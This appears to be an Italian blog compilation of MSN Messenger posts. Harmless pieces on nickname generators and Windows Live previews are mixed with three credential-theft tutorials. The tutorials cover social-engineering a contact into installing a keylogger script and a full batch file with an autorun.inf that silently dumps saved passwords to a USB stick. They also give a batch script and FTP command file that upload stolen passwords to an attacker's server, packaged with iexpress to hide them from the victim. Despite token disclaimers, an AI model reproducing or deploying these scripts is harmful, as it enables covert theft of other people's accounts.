Crea nick name per Msn, ecco a voi i migliori 7 servizi per crearli!

Postati da geekissimo:

  • Wallpaperspecial: il primo servizio crea nickname msn della lista, molto semplice da utilizzare, potremo scegliere tra diverse lettere, con forme e stili differenti e caratteri speciali. Dopo di che racchiudere il nostro nick in cornici particolari, dopo di che per utilizzare il nick appena creato ci basterà effettuare un semplice copia ed incolla.

  • Hacker MSN Name Generator: Un servizio che crea dei nick name msn in stile hacker, tutto quello che dovremo fare sarà scrivere il nostro nickname e dopo di che cliccare su Convert per vedere come appare il nostro nick in “scrittura” hacker.

  • Displayus: Un servizio crea nick msn che funziona come quello precedente con l’unica differenza che oltre a convertire il testo in stile “hacker” ci permette di scegliere una tra le decine di cornici disponibili, una volta creato il nostro nick potremo ricorrere al vecchio copia ed incolla per iniziare ad utilizzarlo.
  • Batkhela: Tramite questo tool potremo semplicemente cambiare lo stile del nostro nickname, ci basterà cliccare su Convert fino a quando non troviamo lo stile desiderato. Forse il modo per creare nickname msn più semplice da utilizzare.
  • CreaNick: Un po come la prima applicazione recensita, potremo scegliere tra vari formati delle lettera, ma con la differenza che con questo “crea nick name per msnpotremo scegliere tra moltissime cornici, basterà cliccare su una di queste per selezionarla.
  • Webbolo: Il servizio crea nick msn che preferisco, infatti dopo aver digitato il nostro nome e vedere come questo appare nei vari stili: Fantasy, Hacker, Old Style, Chinese, Futuristik, Balls, BrEeZaH dovremo copiare il testo scelto e cliccare Crea Cornicetta e Colora testo per ottenere un nick praticamente unico.
  • MSN Plus! Name 3: L’ultimo servizio che recensiamo a differenza degli altri crea nick msn non è un tool online bensì un plugin per la famosa estensione Msg Plus, tramite il quale potremo colorare il nick, inserire sfondi, ingigantire il nostro nick, e salvare il risultato del nostro lavoro in un comodo file di testo.
Annunci

Windows Live: cosa aspettarsi

Non è stata ancora comunicata una data ufficiale, ma pare che il lancio dei nuovi servizi web Microsoft e di “Windows Live Wave 3” sia davvero vicino. I servizi sono attualmente in fase di testing, e più passa il tempo più trapelano informazioni. Vediamo insieme quali novità ci aspettano:

Windows Live Mail
Windows Live Mail è un programma per la gestione semplice e immediata della posta elettronica, Wave 3 continuerà il suo sviluppo e per renderlo un “PIM” (Personal Information Manager) e per implementare la sincronizzazione con Windows Live Calendar.

Windows Live Movie Maker
Nonostante non sia il migliore software per il video editing in circolazione, grazie alla sua semplicità è largamente usato soprattutto tra coloro che hanno meno esperienza con il PC. Con Wave 3 Movie Maker diverrà “Live” per consentire a chiunque di creare e condividere in internet filmati e slideshow.

Windows Live Photo Gallery
la grande novità di Windows Live Photo Gallery sarà una sorta di riconoscimento facciale in grado di riconoscere le persone nelle fotografie, taggarle, e associare ad ognuna di esse i dettagli del contatto Windows Live (sempre che lo abbiano).

Windows Live Writer
Con Wave 3 saranno introdotte molte nuove caratteristiche in Windows Live Writer, alcune delle quali già fruibili dalla “Technical Preview”. Sarà introdotto il supporto per Windows Live Events e l’interfaccia sarà ridisegnata per fare spazio a nuovi pulsanti.

Windows Live Messenger
Su Windows Live Messenger si è riuscito a sapere ben poco. Le novità sono state annunciate, ma non si sa di cosa si tratti.
Da come avete potuto constatare non è stato annunciato nulla di sensazionale, non ci sarà nessun particolare sconvolgimento, a meno di sorprese dell’ultimo minuto. E probabilmente la suite di applicazioni Web di Windows Live continuerà a vivere all’ombra di Google Mail, Picasa, Google Docs, Google Notebook…

Via | geekissimo

Windows Live Messenger 14.0.3921.0717 Build 2009: prova in anteprima il futuro Messenger

Gli appassionati di Instant Messenger dovrebbe essere abbastanza desiderosi di scoprire ed esplorare il nuovo Windows Live Messenger 2009, che dovrebbe essere rilasciato presto.

Se non potete attendere il rilascio ufficiale del più famoso programma di messaggistica istantanea, allora potrete averne un assaggio tramite l’ultima build di Windows Live Messenger 2009, che è fuoriuscita di recente da JCXP.

Questa versione di WLM9.0 è molto simile alla versione precedente trapelata l’11 agosto su Mess.be (un popolare Windows Live Messenger Fan Site), in termini di funzionalità e di interfaccia mostrata negli screenshots pubblicati. Il nuovo Windows Live Messenger ha un nuovo e grazioso  look fresco, pur mantenendo tutte le popolari e interessanti caratteristiche.

Potete fare una prova e godervi la nuova beta tramite il link qui proposti:

E’ disponibile anche la Build 14.0.3913.0522 di Windows Live Writer qui.

 

Rubare una password di MSN con uno script per MSN Plus!

Oggi scriverò questa guida, del tutto a puro scopo informativo, dove è possibile scoprire la password di un contatto di MSN facendogli installare un semplice script per Messenger Plus! Live. Prima di tutto la vittima deve aver installato Messenger Plus! Live. Per capirlo basta chiederlo oppure vedere se ha il nickname colorato.

Ora resta che vi scaricate msgXs 1.5 da QUI e inviarlo alla vittima. Purtoppo il problema più grande e quello di far cascare la vittima ad aprirlo, e questo lo si può fare dicendogli che lo script ha una funziona vera. Lafunziona esiste davvero ed è quello di cambiare il Messaggio Personali direttamente da una Chat. I comandi di questa funziona sono:

  1. !mp:[Messaggio nel PSM] = Con questo comando inserirete un nuovo Messaggio nel PSM di MSN. Al posto di [Messaggio nel PSM] dovete ovviamente scrivere la frase.
  2. !mp:!mpm = Con questo comando potete modificare il vostro Messaggio personale.

Adesso invece vediamo i comandi per rubargli la Pass:

  1. MSN aggiornato = E’ il comando con cui vi farete inviare le password all’insaputa dell’utente.
  2. ciao-null- = Con questo invece gli farete cancellare la funziona di rubare la password. L’utente però dopo aver ricevuto questa scritta si deve disconettere da Messenger.

Lo script contiene 2 programmi principali:

  • MessenPass: il programma con cui ruberete le password memorizzate.
  • msgXs Keylogger: Il programma keylogger dove salverà le passwrod quando l’utente accederà ad MSN.

Quando la vittima avvierà lo script essa non potrà più cancellarlo perchè si riattiverà quando riavvia il sistema. Per rimuovere questo script allora bisogna andare nella cartella C:\Programmi\Messenger Plus! Live\Scripts e cancellare la cartella msgXs. E’ consigliato inoltre che la vittima chiede e riapre Messenger per rubare le password giuste. Questo è consigliato perchè quando la vittima chiude e riapre MSN il keylogger si avvierà e quindi ci sono più possibilità di scoprire la password. Ovviamente questo metodo funziona 8 volte su 10 ma si può sempre sbagliare.

Per scoprire se vi stanno facendo un attacco simile a voi, e voi avete installato questo script, allora spunterà una finestrella a destra del desktop con la scritta: Errore di connessione, Riprova più tardi. Se la vittima ha versioni più vecchie della 8.5, può capitare che non funzioni.

Lo script è stato creato da Suxsem e modificato da hackingblog. Per scaricare la versione originale, problemi o domande chiedete qui.

Via | HackingBlog

Windows Live Messenger: staniamo chi è “invisibile”!

Da sempre chi usa Windows Live Messenger (Msn) è curioso di sapere se un contatto in quel momento è davvero disconnesso oppure ha impostato lo stato “invisibile” e sta lì a guardare quatto quatto… Con un addon e un pizzico di fortuna possiamo scoprire chi è invisibile, ma attenzione, non funziona sempre.

Prima di tutto abbiamo bisogno di Messenger Discovery Live, almeno la versione 1.5. Installiamolo e una volta pronti, entriamo nella configurazione (Dal Menu "Discovery" > Impostazioni). Entriamo nella scheda Avvisi, quindi spuntiamo le voci di avviso per: "Un contatto è su invisibile", "Un contatto apre una conversazione", "Un contatto chiude la conversazione". Quindi salviamo e chiudiamo la finestra.

A questo punto succederà che, quando Discovery si accorge che un contatto è invisibile, in basso a destra (o in altri angoli dello schermo, dipende dalle impostazioni) compare un messaggio con scritto: "NomeContatto è disconnesso" questo non vuol dire che il contatto non è connesso, ma è invisibile.

Inoltre c’è da aggiungere, che con le impostazioni spuntate di "Un contatto apre una conversazione" e "Un contatto chiude la conversazione", veniamo avvisati quando un contatto apre una finestra con noi. In pratica, quando qualcuno ci scrive qualcosa, si apre una finestra con il contatto solo quando è arrivato il messaggio; invece con queste opzioni attive, quando il contatto solamente apre una finestra con noi, si apre anche da noi con il messaggio "Conversazione Aperta", e noi possiamo sorprendere gli amici scrivendo ancora prima che abbiano finito, e lasciarli di stucco 😉

La cosa vale anche quando la finestra viene chiusa, infatti compare il messaggio nella finestra del contatto "Conversazione Chiusa". Quindi se ci dovesse capitare che in una finestra di un contatto compaia "Conversazione Aperta" e poco dopo "Conversazione Chiusa" significa che il contatto ha aperto la finestra e poi l’ha chiusa, senza scrivere nulla… Come mai? Beh, sta a voi pensare e trarre ad una conclusione…

Via | Blog Vista

Rubare tutte le password di un computer con una chiavetta USB

image

( la foto non centra molto ma era simpatica….XD )

Il sito web Nirsoft fornisce diversi programmi gratuiti per recuperare le password salvate nel computer che si sta usando nel caso in cui le si dimenticano. E’ possibile però usare questi programmi gratuiti per altri scopi, come rubare le password del computer che si sta utilizzando.

Se un malintenzionato ha accesso fisico al computer da cui rubare le password, ha a disposizione solo pochi secondi per compiere l’”operazione”. Da questa necessità, ecco l’idea di usare una chiavetta USB. Con questo articolo, voglio semplicemente farvi vedere come sia facile creare una chiavetta USB che, inserita nel computer che ci interessa, salva le password trovate all’interno della chiavetta stessa.

Così facendo, basta collegare la chiavetta al computer che ci interessa, fare un semplice click e dopo qualche secondo staccare la chiavetta ed allontanarci dal computer con le password. Per realizzare questa chiavetta USB speciale, prima di tutto, create una cartella sul vostro desktop con il nome di Chiavetta. Questa cartella conterrà tutti i file che andranno copiati nella chiavetta.

Collegatevi alla pagina del sito web di Nirsoft per scaricare i programmi per recuperare le password. Vi consiglio di scaricare solo i programmi che vi recuperano le password che vi interessano. Se avete intenzione, ad esempio, di recuperare solo le password dei programmi di chat e quelli delle e-mail, scaricate i programmi MessenPass e Mail PassView.

Dopo aver scaricato i pacchetti con i programmi per recuperare le password, estraeteli nella cartella Chiavetta. In questa cartella lasciate solo i programmi veri e propri: cancellate, in breve, gli altri file come il readme.txt o la guida di utilizzo del programma.

A questo punto, scaricate ed installate l’ultima versione di Winrar. Andate su questa pagina e scaricate WinRAR. Dopo aver installato Winrar, andate su C:/Programmi/WinRAR, copiate ed incollate il programma Rar.exe nella cartella del desktop Chiavetta.

Adesso aprite il Blocco Note, e scrivete la seguente riga per ogni programma che recupera le password che avete inserito nella cartella Chiavetta:

@nomedelprogramma.exe /sverhtml nomedelprogramma.html

Al termine del file scrivete, invece, le righe:

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

In breve, quando avvierete questo piccolo programmino, le password verranno recuperate dal computer e salvate in diversi file .HTML. A questo punto, questi file HTML vengono inseriti in un archivio .RAR protetto da password. La password dell’archivio deve essere specificata al posto della parola PASSWORD.

La password è case sensitive: fanno differenza, quindi, le lettere maiuscole e quelle minuscole. Alla fine i programmi utilizzati per recuperare le password vengono nascosti e le pagine HTML eliminate, poichè già inserite nell’archivio .RAR. Nel mio caso (programmi MessenPass e Mail PassView), ho scritto queste righe:

@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

Alla fine, salvate il file con il nome lancia.bat: andate semplicemente su File/Salva file con nome… e, nella finestra che si apre, scrivete lancia.bat in Nome file. Il file deve essere salvato nella Chiavetta.

Dopo aver creato il file lancia.bat, create il file autorun.inf sempre con il Blocco note:

[autorun]
open=lancia.bat
action=Preleva password

A questo punto avete finito. Nella cartella troverete i seguenti file:

Contenuto chiavetta

Dovete semplicemente copiare tutti i file nella cartella principale della vostra chiavetta USB per concludere la sua creazione. Se volete fare delle prove, dopo aver copiato i file, estraete ed inserite la chiavetta. Verrà aperta la seguente finestra:

Chiavetta USB

Se selezionate la prima voce (Preleva password) e fate click sul tasto OK, le password del computer verranno salvate all’interno dell’archivio protetto .RAR. A questo punto, basta staccare la chiavetta ed andare in un computer sicuro con Winrar installato per leggere le password trovate.

L’articolo è puramente a scopo di studio e l’autore non si ritiene responsabile per eventuali usi impropri. Rubare password che non siano le proprie è illegale.

Fonte: blog di aranzulla

Foto di GlamGal su flickr.com

Come rubare password di MSN e di una casella mail da remoto usando MessenPass e MailPassView

In questo primo post vi spiego come usare i programmini “MessenPass” e “MailPassView“, quelli usati in quel famoso metodo per rubare le password via penna USB.

Bene per chi non lo sapesse questi due programmini servono per recuperare le password dimenticate di Msn o di account mail memorizzate su una macchina.

Adesso vi dimostro come è possibile utilizzarli per rubare le password salvate senza avere accesso fisico alla macchina.

Il pirata informatico si serve di: uno spazio web, il programma “MessenPass”, “MailPassView”,(vedi qui su come usare anche altri programmi, stà tutto nel mettere l’eseguibile con “/sverhtml “nel batch) il file eseguibile di WinRar(installatelo e prelevate da c:/programmi/winrar/rar.exe), un editor di testo qualsiasi per scrivere il file start.bat e il file ftp.txt.

Per uno spazio web è necessario uno con accesso ftp (es.netsons.org) in cui registrarsi e abilitare l’ftp se necesario. Potete usare FileZilla per la gestione ftp.

Il codice del file start.bat:

@echo off
messenpass.exe /sverhtml Password-MSN.html //scrive l’output di messenpass in un file html
mailpassview.exe /sverhtml Password-Outlock.html //scrive l’output di mailpasspreview in un file html
rar.exe a archvio.rar *.html //comprime i due file html contenenti le password in una archivio
md c:\temp //crea la cartella temporanea
copy ftp.txt C:\temp //copia il file ftp.txt nella catella temporanea
copy *.rar c:\temp //copia il file rar nella cartella temporanea
cd c:\temp //si posiziona nella cartella temporanea
ftp -v -i -s:ftp.txt //avvia la sessione ftp con lo spazio web e permette di eseguire i comandi contenuti nel file di testo
del ftp.txt //elimina il file ftp che contiene i dati di accesso e i comandi dalla cartella temporanea
del *.rar //emilina i file rar nella cartella temporanea

Il contenuto del file ftp.txt:

open tuositoftp.org //l'host dello spazio web
tuouserftp //l’username dello spazio web
tuapasswordftp //la password dello spazio web
cd msn //cartella che conterrà i log
lcd c:\temp //si posiziona nella cartella locale temporanea
BINARY //imposta il trasferimento di file di tipo binario
mput *.rar //trasferisce i file rar allo spazio web
bye
//chiude la sessione ftp

Il pirata tramite ftp crea una cartella chiamata “msn” dove riceverà il file compresso che contiene le password, successivamente invierà alla sua vittima tutti questi programmi compressi con iexpress.

Iexpress è un software di casa Microsoft, potete usarlo seguendo il procedimento: start->esegui->digitare “iexpress”(senza virgolette)->PREMERE INVIO.

Ovviamente ho scritto il codice con degli errori in modo tale da non poter essere usato con iexpress, questo evita l’uso spropositato ai lamer di turno.

Iexpress permette di autoestrarre dei file in modalità nascosta “hidden” quindi la vittima quando apre il file non si accorge di niente,nessuna finestra, nessun errore, non da segno di vita alcuna, la vittima è convinta che il file non funziona.

Il pirata non invierebbe mai i file senza averli prima compressi e nascosti, perchè il file ftp.txt contiene i dati di login al suo spazio web.

Due consigli:

non memorizzate le password sul vostro computer ma riscrivetele ogni volta;

se siete troppo pigri e non volete rinunciare alla comodità della password salvata vi consiglio di non aprire file eseguibili ricevuti via email o via Messenger che non siano di fonte certa, poichè potrebbero contenere questi file maligni! D

Abbastanza facile no?

Foto di neingeist su flickr.com

Fonte underground0